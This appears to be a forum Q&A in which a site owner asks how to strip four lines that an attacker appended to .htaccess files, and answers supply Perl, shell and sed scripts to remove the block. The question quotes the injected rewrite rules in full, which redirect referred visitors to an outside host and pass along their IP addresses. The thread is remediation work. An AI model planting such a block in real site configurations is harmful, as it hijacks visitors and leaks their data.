Removing a text block from a file: sed?

Following an attack, I need to remove 4 lines of text that were added to the .htaccess files on my site, and was thinking sed would be the way to go, but cannot see how in spite of many attempts.

The added lines are

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://targeturlhere.net/%{REMOTE_ADDR}

I managed to write a script that removes the newly added .htaccess files containing only those lines, but for pre-existing .htaccess files to which the block was appended I have to edit the file rather than delete it. I cannot simply remove the lines one by one, nor use "RewriteEngine On" as a start marker, since that directive sometimes appears legitimately elsewhere in the file.

In most cases those lines are the last, but I guess in other files they could be in the middle, so I was trying to remove exactly that block - and have a script I could reuse in a similar case.

(Edit: my 4 lines follow one another with no blank line in between, but the editor here seems either to show no line break or to add a blank one.)

Any hint or tip? Thanks.


If you can't trigger off the 'RewriteEngine On' line (because it is occasionally used legitimately), then 'sed' is probably not the correct tool for the job. I'd use Perl (tested code follows):

my $file;
do { local $/; $file = <>; }; # Slurp!

# Literal braces are escaped so the pattern also compiles cleanly on
# modern Perls, where an unescaped '{' in a regex can be a fatal error.
$file =~ s{
            RewriteEngine \s On \n
            RewriteCond \s %\{HTTP_REFERER\} \s [\^]http:// \n
            RewriteCond \s %\{HTTP_REFERER\} \s !%\{HTTP_HOST\} \n
            RewriteRule \s \. \s http://targeturlhere\.net/%\{REMOTE_ADDR\} \n
          }{}gmsx;

print $file;

The file is slurped into memory; the unwanted data is then removed (repeatedly, in case one of the files was modified multiple times), and the residue is written to standard output. The gmsx modifiers do:

  • g - global (replace every occurrence)
  • m - multiline (^ and $ match at internal line boundaries)
  • s - single-line (. matches newline too)
  • x - extended (white space in the pattern is ignored - use \s (or \s+) to match actual white space)

This is designed to process one file at a time (per invocation of the script). You can make it handle multiple files on the command line, with overwriting of the originals and so on, if you are careful; the problem area is the 'slurp' operation. The code assumes you want to read the whole file into memory and work on that - which is correct, since you need to match across multiple lines.
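For instance, assuming the Perl above is saved as fixit.pl (the name used again below) and with placeholder paths, one file could be processed like this:

# placeholder paths; write to a scratch file first, then replace the original
perl fixit.pl /var/www/site/.htaccess > /tmp/htaccess.clean &&
    mv /tmp/htaccess.clean /var/www/site/.htaccess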


The comment asks:

[I] already have a working bash script that lists and scans hosted sites, then deletes files containing only those lines, and I was waiting to add that editing function. Can I simply use Perl now inside that script, or by calling it?

If you can identify that the file contains material other than just the four lines you need removed, then you can invoke Perl from inside the script to deal with that file:

  • Save the code I showed in a file fixit.pl:
    • Add a shebang line #!/usr/bin/env perl
    • For good discipline, consider adding use strict; and use warnings; after the shebang and before the code. In this case, it makes no difference (the code is clean), but if you're making changes, include those lines. I do - but I know I'm fallible. (The complete script, with these additions, is sketched after the shell fragment below.)
    • Make it executable, and in a directory on your PATH, or know its location.
  • In your shell script:

    ...
    else
        fixit.pl "$file" > $tmp.1
        mv $tmp.1 "$file"
    fi
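
Putting those pieces together, the complete fixit.pl might read (the same code as above, plus the shebang and pragmas):

#!/usr/bin/env perl
use strict;
use warnings;

my $file;
do { local $/; $file = <>; }; # Slurp!

$file =~ s{
            RewriteEngine \s On \n
            RewriteCond \s %\{HTTP_REFERER\} \s [\^]http:// \n
            RewriteCond \s %\{HTTP_REFERER\} \s !%\{HTTP_HOST\} \n
            RewriteRule \s \. \s http://targeturlhere\.net/%\{REMOTE_ADDR\} \n
          }{}gmsx;

print $file;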
    

You may have other ways of doing it, but it need not be any more complex than that. I'm assuming that you have a variable tmp initialized appropriately:

tmp=${TMPDIR:-/tmp}/fixit.$$

You would probably want to include traps to ensure that the file is cleaned up:

trap "rm -f $tmp.?; exit 1" 0 1 2 3 13 15
...code as above...
rm -f $tmp.?
trap 0
exit 0

The first trap line traps signals 1 (HUP), 2 (INT), 3 (QUIT), 13 (PIPE), and 15 (TERM), plus any shell exit of its own accord (0), and executes the given commands (removing the temporary file and exiting with a failure status). The stray rm -f line makes sure the file is missing; the trap 0 cancels the trap for 'shell exiting of its own accord', and the exit 0 exits successfully. It means you can interrupt your processing and not have stray files left around - good practice for any shell script that creates temporary files.
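
Pulled together, a minimal wrapper might look like this (the .htaccess location is a placeholder for however your existing script finds the files; the delete-vs-edit decision is left to the logic you already have):

#!/bin/sh
tmp=${TMPDIR:-/tmp}/fixit.$$
trap "rm -f $tmp.?; exit 1" 0 1 2 3 13 15

for file in /var/www/*/.htaccess    # placeholder: however your script finds them
do
    # Your existing script already deletes files consisting solely of the
    # injected block; this sketch covers only the edit-in-place case.
    fixit.pl "$file" > $tmp.1
    mv $tmp.1 "$file"
done

rm -f $tmp.?
trap 0
exit 0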

Alternatively, you could use:

perl -i.bak fixit.pl "$file"

This will create a file named "$file.bak" containing the original, and the cleaned output goes to the original file name "$file". This avoids the need for traps, etc. If you don't want the backup file, omit the '.bak' from the command line.
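
For example, find can drive the in-place edit across a whole tree (the site root /var/www is a placeholder):

# each edited file keeps its original beside it as .htaccess.bak
find /var/www -name .htaccess -exec perl -i.bak fixit.pl {} \;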


sed '1{N;N};N;\|\nRewriteRule . http://targeturlhere.net/%{REMOTE_ADDR}$|d;P;D' inputfile

This maintains a sliding four-line window in the pattern space and looks for the last line of the set of four; when that line is found, all four are deleted. Every other line passes through unchanged.
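
Spread out, with the commands on their own lines and comments added (GNU sed accepts full-line # comments in a script), the same command reads:

sed '
# on line 1 only, append the next two lines to the pattern space
1{N;N}
# append one more line: the pattern space now holds a window of 4 lines
N
# if the window ends with the injected RewriteRule line, delete all 4
\|\nRewriteRule . http://targeturlhere.net/%{REMOTE_ADDR}$|d
# otherwise print the oldest line of the window ...
P
# ... then drop it and restart the cycle with the remaining 3 lines
D
' inputfile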

You can add the -i option to make it modify the files in place, with an optional backup suffix to keep the original. Note that the syntax differs: GNU sed wants the suffix attached to the option (sed -i.bak ...), while BSD/macOS sed takes it as a separate argument (sed -i .bak ...).
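For example, with GNU sed, keeping a backup of each original:

sed -i.bak '1{N;N};N;\|\nRewriteRule . http://targeturlhere.net/%{REMOTE_ADDR}$|d;P;D' .htaccess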

